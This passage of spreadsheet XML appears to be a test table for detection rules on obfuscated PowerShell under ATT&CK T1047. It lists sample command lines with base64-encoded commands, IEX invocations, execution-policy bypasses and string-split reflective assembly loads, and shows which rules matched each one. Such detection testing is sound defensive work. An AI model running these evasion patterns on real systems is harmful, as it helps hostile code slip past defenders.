          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E4233" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F4233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4233" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J4233" s="43" t="n"/>
      <c r="K4233" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4234" ht="15.75" customHeight="1" s="42">
      <c r="A4234" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4234" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4234" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4234" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4234" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F4234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4234" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4234" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4234" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J4234" s="43" t="n"/>
      <c r="K4234" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4235" ht="15.75" customHeight="1" s="42">
      <c r="A4235" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4235" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4235" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4235" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4235" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXEcutIonpoliCY Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4235" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4235" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4235" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4235" s="43" t="n"/>
      <c r="K4235" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4236" ht="15.75" customHeight="1" s="42">
      <c r="A4236" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4236" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4236" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4236" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4236" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4236" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4236" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4236" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4236" s="43" t="n"/>
      <c r="K4236" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4237" ht="15.75" customHeight="1" s="42">
      <c r="A4237" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4237" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4237" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4237" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4237" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4237" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4237" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4237" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4237" s="43" t="n"/>
      <c r="K4237" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4238" ht="15.75" customHeight="1" s="42">
      <c r="A4238" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4238" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4238" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4238" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4238" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCutIoNPoLicY Bypass /"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4238" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4238" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4238" s="43" t="n"/>
      <c r="K4238" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4239" ht="15.75" customHeight="1" s="42">
      <c r="A4239" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4239" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C4239" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D4239" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E4239" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"e" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F4239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4239" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4239" s="43" t="n"/>
      <c r="J4239" s="43" t="n"/>
      <c r="K4239" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4240" ht="15.75" customHeight="1" s="42">
      <c r="A4240" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4240" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4240" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4240" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4240" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4240" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4240" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4240" s="43" t="n"/>
      <c r="K4240" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4241" ht="15.75" customHeight="1" s="42">
      <c r="A4241" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4241" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4241" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4241" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4241" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4241" s="43" t="n"/>
      <c r="J4241" s="43" t="n"/>
      <c r="K4241" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4242" ht="15.75" customHeight="1" s="42">
      <c r="A4242" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4242" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4242" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4242" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4242" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4242" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4242" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4242" s="43" t="n"/>
      <c r="K4242" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4243" ht="15.75" customHeight="1" s="42">
      <c r="A4243" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4243" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4243" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4243" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4243" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4243" s="43" t="n"/>
      <c r="K4243" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4244" ht="15.75" customHeight="1" s="42">
      <c r="A4244" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4244" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C4244" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D4244" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E4244" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F4244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4244" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4244" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4244" s="43" t="n"/>
      <c r="K4244" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4245" ht="15.75" customHeight="1" s="42">
      <c r="A4245" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4245" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4245" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4245" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4245" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F4245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4245" s="43" t="n"/>
      <c r="J4245" s="43" t="n"/>
      <c r="K4245" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4246" ht="15.75" customHeight="1" s="42">
      <c r="A4246" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4246" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4246" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4246" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4246" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4246" s="43" t="n"/>
      <c r="J4246" s="43" t="n"/>
      <c r="K4246" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4247" ht="15.75" customHeight="1" s="42">
      <c r="A4247" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4247" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4247" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4247" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4247" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::("{1}{0}" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4247" s="43" t="n"/>
      <c r="J4247" s="43" t="n"/>
      <c r="K4247" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4248" ht="15.75" customHeight="1" s="42">
      <c r="A4248" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4248" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4248" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4248" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4248" s="43" t="n"/>
      <c r="J4248" s="43" t="n"/>
      <c r="K4248" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4249" ht="15.75" customHeight="1" s="42">
      <c r="A4249" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4249" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4249" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4249" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4249" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4249" s="43" t="n"/>
      <c r="J4249" s="43" t="n"/>
      <c r="K4249" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4250" ht="15.75" customHeight="1" s="42">
      <c r="A4250" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4250" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4250" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4250" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4250" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4250" s="43" t="n"/>
      <c r="J4250" s="43" t="n"/>
      <c r="K4250" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4251" ht="15.75" customHeight="1" s="42">
      <c r="A4251" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4251" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4251" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4251" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4251" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Reflection.Assembly]::(" {1}{0}" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4251" s="43" t="n"/>
      <c r="J4251" s="43" t="n"/>
      <c r="K4251" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4252" ht="15.75" customHeight="1" s="42">
      <c r="A4252" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4252" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4252" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4252" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4252" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(" {1}{0}" -"f" 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4252" s="43" t="n"/>
      <c r="J4252" s="43" t="n"/>
      <c r="K4252" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4253" ht="15.75" customHeight="1" s="42">
      <c r="A4253" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4253" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4253" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4253" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4253" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::(" {1}{0}" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4253" s="43" t="n"/>
      <c r="J4253" s="43" t="n"/>
      <c r="K4253" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4254" ht="15.75" customHeight="1" s="42">
      <c r="A4254" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4254" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C4254" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D4254" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E4254" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(" {1}{0}" -f 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F4254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4254" s="43" t="n"/>
      <c r="J4254" s="43" t="n"/>
      <c r="K4254" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4255" ht="15.75" customHeight="1" s="42">
      <c r="A4255" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4255" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4255" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4255" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4255" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F4255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4255" s="43" t="n"/>
      <c r="J4255" s="43" t="n"/>
      <c r="K4255" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4256" ht="15.75" customHeight="1" s="42">
      <c r="A4256" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4256" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4256" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4256" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4256" s="43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F4256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4256" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J4256" s="43" t="n"/>
      <c r="K4256" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4257" ht="15.75" customHeight="1" s="42">
      <c r="A4257" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4257" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4257" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4257" s="43" t="inlineStr">
        <is>
